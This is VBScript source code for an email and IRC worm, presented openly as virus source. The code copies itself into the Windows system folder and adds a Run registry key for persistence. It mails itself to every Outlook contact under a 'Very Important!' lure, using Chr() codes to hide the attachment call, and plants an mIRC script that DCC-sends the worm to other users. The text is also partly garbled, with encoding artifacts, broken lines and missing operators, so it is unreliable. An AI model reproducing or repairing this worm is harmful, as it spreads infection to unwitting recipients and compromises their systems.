Home Page Virus Source Code

1. 'Homepage Created By Robinhood
2. Set FSO =3D createobject("scripting.filesystemobject")
3. dirsystem =3D FSO.getspecialfolder(1)
4. Path=3D dirsystem & "\Win32.dll.vbs"
5. Set WSH createobject("wscript.shell")
6. WSH.regwrite
7. "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll",
8. "wscript.exe " & Path& " %"
9. FSO.copyfile wscript.scriptfullname, Path
10. payload=20
11. If =
12. WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\Send
13. mail") <> 1 then
14. sendmail
15. End if
16. If
17. WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\IRC"
18. ) <> 1 then
19. IRC ""
20. End if
21. Set sourcefile=3D FSO.opentextfile(wscript.scriptfullname)
22. sourcetext sourcefile.readall
23. sourcefile.close
24. Do
25. if not(FSO.fileexists(wscript.scriptfullname)) then
26. set filebackup=3D FSO.createtextfile(wscript.scriptfullname)
27. filebackup.write sourcetext
28. filebackup.close
29. end if
30. sWSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Win32dll"
31. )
32. If s<> "wscript.exe " & Path& " %" then
33. WSH.regwrite =
34. "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll", "wscript.exe " & Path& " %"
35. end if
36. s=3D ""
37. loop=20
38.  
39. Function sendmail()
40. Set myapp =3D CreateObject("Outlook.Application")
41. If myapp =3D "Outlook" Then
42. Set myname =3D myapp.GetNameSpace("MAPI")
43. Set myaddlists =3D myname.AddressLists
44. For Each myaddlist In myaddlists
45. If myaddlist.AddressEntries.Count <> 0 Then
46. x =3D myaddlist.AddressEntries.Count
47. For i =3D 1 To x
48. Set mailitem =3D myapp.CreateItem(0)
49. Set myadd =3D myaddlist.AddressEntries(i)
50. mailitem.To =3D myadd.Address
51. mailitem.Subject =3D "Very Important!"
52. mailitem.Body =3D "Hi:" & vbcrlf & "Please view this file, it's very
53. important." & vbcrlf & ""
54. execute "set myatts =3Dmailitem." & Chr(65) & Chr(116) & Chr(116) &
55. Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116)
56. & Chr(115)
57. copypath Path
58. mailitem.DeleteAfterSubmit True
59. myatts.Add copypath
60. If mailitem.To <> "" Then
61. mailitem.Send
62. End If
63. Next
64. End If
65. Next
66. End If
67. End function
68. Function IRC(ircpath)
69. If ircpath <> "" Then
70. programpath
71. WSH.regread("HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion
72. \ProgramFilesDir")
73. If FSO.fileexists("c:\mirc\mirc.ini") Then
74. ircpath =3D "c:\mirc"
75. ElseIf FSO.fileexists("c:\mirc32\mirc.ini") Then
76. ircpath =3D "c:\mirc32"
77. ElseIf FSO.fileexists(programpath & "\mirc\mirc.ini") Then
78. ircpath =3D programpath & "\mirc"
79. ElseIf FSO.fileexists(programpath & "\mirc32\mirc.ini") Then
80. ircpath =3D programpath & "\mirc"
81. Else
82. ircpath =3D ""
83. End If
84. End If
85. If ircpath <> "" Then
86. Set ircscript =3D FSO.CreateTextFile(ircpath & "\script.ini", True)
87. text =3D "[script]" & vbCrLf & "n0=3Don 1:JOIN:#:{"
88. text =3D text & vbCrLf & "n0=3Don 1:JOIN:#:{"
89. text =3D text & vbCrLf & "n1=3D /if ( $nick =3D=3D $me ) { halt }"
90. text =3D text & vbCrLf & "n2=3D /." & Chr(100) & Chr(99) & Chr(99) & "
91. send $nick "
92. text =3D text & Path
93. text =3D text & vbCrLf & "n3=3D}"
94. ircscript.write(text)
95. ircscript.Close
96. End If
97. End Function=20
98.  
99. Function payload()
100. Randomize
101. If 1 + Int(Rnd * 5) =3D 7 then
102. WSH.run "Http://www.virii.com.ar",false
103. end if
104. end function